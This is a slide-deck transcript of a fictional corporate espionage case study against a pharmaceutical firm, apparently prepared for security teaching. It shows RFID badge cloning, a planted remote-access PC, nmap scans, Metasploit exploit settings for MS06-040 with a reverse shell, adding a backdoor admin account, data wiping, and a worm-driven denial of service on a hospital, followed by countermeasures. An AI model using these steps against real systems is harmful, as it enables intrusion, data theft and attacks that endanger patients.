Corporate Espionage. Comptetitor of Alki Pharmaceuticals wants to get any technical information or...
-
Upload
neil-doyle -
Category
Documents
-
view
220 -
download
1
Transcript of Corporate Espionage. Comptetitor of Alki Pharmaceuticals wants to get any technical information or...
Tel 283Corporate Espionage
Comptetitor of Alki Pharmaceuticals wants to get any technical information or research
Not have the hack traced back Launch a disabling attack on the hospital
across from Alki◦ Critical services impacted, resulting in patient
death “Contractor” threatened hacker’s girlfriend
◦ Eight weeks allowed for the hack
Background
1999$25 Billion◦ US Chamber of Commerce survey
2003$89 Billion from the Fortune 1000 companies◦ Pricewaterhouse Coopers and ASIS survey
(American Society for Industrial Security) 2007$100 Billion plus
Cost of corporate espionage
Reconnaissance Physical Access Executing the Hacks DoS of Hospital Other “stuff”
The Exploit
Google search◦ “intext:alki pharmaceuticals”
Mentions software vendor for Alki Get info from vendor’s webpage
Technical documentation Type of servers Ports Technical forum
SA from Alki complaining about software’s restrictions
Physical recon◦ Employees have RFID badges
www.sec.gov◦ EDGAR search on publicly traded corporations
Recon
Python libraries for reading RFID devices Readers are available for purchase
◦ Depending on standard, anywhere from $50 to $1000
A writer will clone a valid RFID device Phoenix met official of Alki
◦ Got physically close enough to read her badge◦ Now has access to every place the CFO is allowed
RFIDIOt
CFO takes “prospective employee” on tour◦ Observes which areas are carded◦ Reads cards of 15 employees
Remembering the order of cards being read and locations
◦ Will attempt to get a janitor’s RFID card as well
Social engineering
Mini-PC with Vista◦ VMWare
Running Knoppix Live CD ISO◦ Integrated CDMA-EVO cellular card◦ Integrated 10/100 Ethernet NIC
Phoenix hopes to plant the mini-PC physically at Alki◦ Get IP via DHCP◦ Connect to Internet using the cellular card
Using Hotmail account traceable back to Alki employee (backup email account points back to the employee)◦ Set up GoToMyPC trial account
Physical intrusion set for when janitors start night services
Tools
Phoenix takes elevator (using cloned CFO’s card) and enters the NOC room◦ Uses card to enter the NOC room
No biometrics in place!◦ Racks are neatly labeled indicating which units
are R&D switches
Intrusion
Phoenix plugs patch cable into an open port on R&D switch◦ Attaches the mini-PC to the switch
Gets an IP via DHCP Boots up the Knoppix Live CD ISO under VMWare
Ifconfig reveals a supplied IP address of 10.0.0.6 Going back to the host OS (Vista), he fires up the
CDMA software GoToMyPC is connected to the Internet
◦ Secretes the mini-PC and the power supply◦ Takes a wireless access point, with an Alki
inventory control tag and leaves
Intrusion
On the train going home Phoenix uses a CDMA connection on his laptop to verify a connection◦ Brings up a web browser◦ Utilizing the CFO’s bogus account, logs into
www.gotomypc.com◦ Connects to the planted mini-PC in the Alki NOC
room
Intrusion
On returning home, reconnects using GoToMyPC◦ Goes to the VMWare and in the shell starts up Nmap
nmap 10.0.0.0/24◦ Shows the hosts and which ports are listening on
these hosts 10.0.0.14
Shows port 12345, which was the port the R&D server listens on (info developed through passive intel gathering)
nmap –A 10.0.0.14 –p 12345 Attempts to uncover the OS
Response is either XP / SP2 or Windows Server 2003 Directory Services ports are open
Probably Windows Server 2003 host
Intrusion
Recalling complaints about vendor’s software being incapable of working with SP1◦ www.microsoft.com/security
Search for SP1 fixes MS06-040 netapi32.dll ex;oitable
Uses Metasploit to see if there’s an available exploit
use windows/smb/ms06_040_netapi◦ Gets the Metasploit prompt
msf exploit(ms06_040_netapi)>
Intrusion
At the Metasploit promptset PAYLOAD generic/shell_reverse_tcpset RHOST 10.0.0.14set LHOST 10.0.0.6
Phoenix now sees the following on his screen
C:\WINDOWS\system32> Phoenix has access to the target system!
Metasploit
Phoenix is on the target system with Local System privilege◦ Higher that Administrator!!!
Once on the target system Phoenix enters the following commands at the prompt◦ net user linda alki$$ /ADD
(Linda is the CFO)◦ net localgroup administrators linda /ADD
Intrusion: Target Access
Phoenix walks into the hospital and locates a room with available Ethernet plugs near the ER◦ gets IP address◦ Plugs in the stolen Alki wireless access point◦ Resets the AP to factory defaults
Configures it to support DHCP◦ Verifies that he can connect via the AP◦ Jacks the laptop into Ethernet port
Runs nmap 10.10.10.0/24 Response is 12 hosts
Possibly all in ER due to proximity Maps out the OS on each host
Results go to ADS text file Nmap -A 10.10.10.0/24 > c:\OSDetect.txt:ads.txt
Intrusion: Hospital
The laptop was purchased with cash with false information supplied at a computer “superstore”◦ Laptop loaded with viruses, virus construction kit, recon
tools, etc Using the laptop
◦ Phoenix logged into the Hotmail account (posing as CFO from Alki) Leaving the “remember me” settings on
Making investigators’ job easier
◦ Sent/received emails asking for help on scanning, creating viruses and exploiting unpatched PCs
◦ Visited websites, leaving history on PC Verifies that the rouge access point functions from
outside the hospital
Intrusion: Hospital
R&D server partitions mapped out◦ C: system partition◦ D: data partition, shared by researchers
Over a network connection a network share is established to a 1TB drive attached◦ Windows “Backup” of D: target system to the 1 TB
drive Physical entry back into Alki NOC room
◦ Using the mini-PC and Remote Desktop Data partition deleted from D: Windows system directory deleted from C:
Intrusion: Alki
From coffee shop next to the hospital, Phoenix uses Remote Desktop to connect to the mini-PC in the hospital and executes “wshwc.exe”◦ Windows Scripting Host Worm Construction
program
DoS: Hospital
WSHWC◦ Names the work Alkibot◦ Payload option: Launch Denial of Service Attack◦ Creates a separate worm for each of the 7 Unix
(Solaris) hosts identified using nmap These .vbs files, along with 5 additional .vbs files for
the other Windows boxes are saved in the laptop Bat file constructed to execute the .vbs files
sequentially◦ Executes the bat file
DoS: Hospital
News reports◦ ER monitoring units (Solaris systems) were not
able to send data out Resulted in cardiac arrest of 1 patient Incorrect medication prescribed to another patient Drips ran out for two other patients
◦ Alki executive arrested (CFO)◦ Alki stock value sharply down◦ Alki competitor announced they were ahead of
schedule in release of drug
DoS: Hospital
Breach of confidentiality of employee information
Creation of backdoors, shell account◦ Sell these
Access to Alki’s banking information (Accounting dept.)
Stock manipulation
Other options
Detailed tech info of Alki software uncovered by going to vendor’s site
RFID attack assisted in gaining physical access to Alki◦ Bolstered by social engineering
Nmap scan identified Alki R&D server Microsoft.com used to uncover potential exploits for the
server Metasploit used to invoke the exploit Windows Backup used to copy R&D data remotely using
network share Delete of data (getting rid of evidence, causing diversion) Hotmail account set up to implicate CFO Set up rogue AP in hospital, lauched DoS attack
Summary
Physical security◦ Single factor access to restricted areas
Implement multi-layer measures◦ Note: Encryption of the RFID means nothing if it’s
cloned as the attacker does not need to “read” the data, just use it
◦ Cameras / CCTV should be used◦ Access device should not also be the ID card
ID card is visible, RFID device should be in a shielded carrier
◦ Disable open ports on a switch
Countermeasures
Scanning attack◦ Turn off ICMP◦ Turn on Windows Firewall
Simple nmap scans would come back with no results Possible to get results, just more complex scans
◦ Client IDS Cisco Security Agent (CSA)
Detects SYN stealth scans, for example Perhaps make it impossible to determine which host
was the R&D server
Countermeasures
Social Engineering◦ Training!◦ Policies◦ Testing of policies
OS attacks◦ Patching
Pressure vendor to fix application to work with later release of OS which is patched
Consider another software solution (dump the vendor)
Data theft◦ encryption
Countermeasures